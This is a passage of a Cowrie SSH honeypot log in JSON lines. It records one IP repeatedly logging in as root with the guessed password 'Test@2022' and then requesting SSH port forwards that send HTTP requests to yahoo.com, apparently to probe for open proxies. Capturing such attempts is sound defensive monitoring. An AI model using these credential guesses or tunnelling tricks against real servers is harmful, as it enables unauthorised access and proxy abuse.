{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.531714Z","src_ip":"213.209.150.239","session":"ed320186dcd5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.579180Z","src_ip":"213.209.150.239","session":"ed320186dcd5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.814162Z","src_ip":"213.209.150.239","session":"ed320186dcd5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8381,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8381","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.862543Z","session":"ed320186dcd5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.909770Z","src_ip":"213.209.150.239","session":"ed320186dcd5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":21077,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21077","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.045668Z","session":"ed320186dcd5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.092796Z","src_ip":"213.209.150.239","session":"ed320186dcd5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.140702Z","src_ip":"213.209.150.239","session":"ed320186dcd5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59331,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea814d7f3e77","protocol":"ssh","message":"New connection: 213.209.150.239:59331 (1.2.3.4:22) [session: ea814d7f3e77]","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.196425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.197557Z","src_ip":"213.209.150.239","session":"ea814d7f3e77"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.254114Z","src_ip":"213.209.150.239","session":"ea814d7f3e77"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.536390Z","src_ip":"213.209.150.239","session":"ea814d7f3e77"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":6392,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6392","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.593826Z","session":"ea814d7f3e77"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.650498Z","src_ip":"213.209.150.239","session":"ea814d7f3e77"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":980,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:980","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.807127Z","session":"ea814d7f3e77"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.863845Z","src_ip":"213.209.150.239","session":"ea814d7f3e77"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.921783Z","src_ip":"213.209.150.239","session":"ea814d7f3e77"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"317ad678364d","protocol":"ssh","message":"New connection: 213.209.150.239:59392 (1.2.3.4:22) [session: 317ad678364d]","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.977432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:11.978166Z","src_ip":"213.209.150.239","session":"317ad678364d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.035282Z","src_ip":"213.209.150.239","session":"317ad678364d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.317472Z","src_ip":"213.209.150.239","session":"317ad678364d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":30265,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30265","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.375131Z","session":"317ad678364d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.431846Z","src_ip":"213.209.150.239","session":"317ad678364d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15949,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15949","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.587132Z","session":"317ad678364d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.643967Z","src_ip":"213.209.150.239","session":"317ad678364d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.701438Z","src_ip":"213.209.150.239","session":"317ad678364d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59438,"dst_ip":"1.2.3.4","dst_port":22,"session":"92e926389bf7","protocol":"ssh","message":"New connection: 213.209.150.239:59438 (1.2.3.4:22) [session: 92e926389bf7]","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.747911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.748867Z","src_ip":"213.209.150.239","session":"92e926389bf7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:12.795918Z","src_ip":"213.209.150.239","session":"92e926389bf7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.031102Z","src_ip":"213.209.150.239","session":"92e926389bf7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":3685,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:3685","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.080365Z","session":"92e926389bf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.127650Z","src_ip":"213.209.150.239","session":"92e926389bf7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22012,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22012","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.265531Z","session":"92e926389bf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.313071Z","src_ip":"213.209.150.239","session":"92e926389bf7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.360876Z","src_ip":"213.209.150.239","session":"92e926389bf7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59475,"dst_ip":"1.2.3.4","dst_port":22,"session":"75f18a8bc936","protocol":"ssh","message":"New connection: 213.209.150.239:59475 (1.2.3.4:22) [session: 75f18a8bc936]","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.406968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.407914Z","src_ip":"213.209.150.239","session":"75f18a8bc936"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.454894Z","src_ip":"213.209.150.239","session":"75f18a8bc936"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.689370Z","src_ip":"213.209.150.239","session":"75f18a8bc936"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8104,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8104","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.737173Z","session":"75f18a8bc936"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.784237Z","src_ip":"213.209.150.239","session":"75f18a8bc936"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":895,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:895","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.921344Z","session":"75f18a8bc936"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:13.968472Z","src_ip":"213.209.150.239","session":"75f18a8bc936"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.016211Z","src_ip":"213.209.150.239","session":"75f18a8bc936"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59521,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca4111dd7468","protocol":"ssh","message":"New connection: 213.209.150.239:59521 (1.2.3.4:22) [session: ca4111dd7468]","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.062888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:14.064024Z","src_ip":"213.209.150.239","session":"ca4111dd7468"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5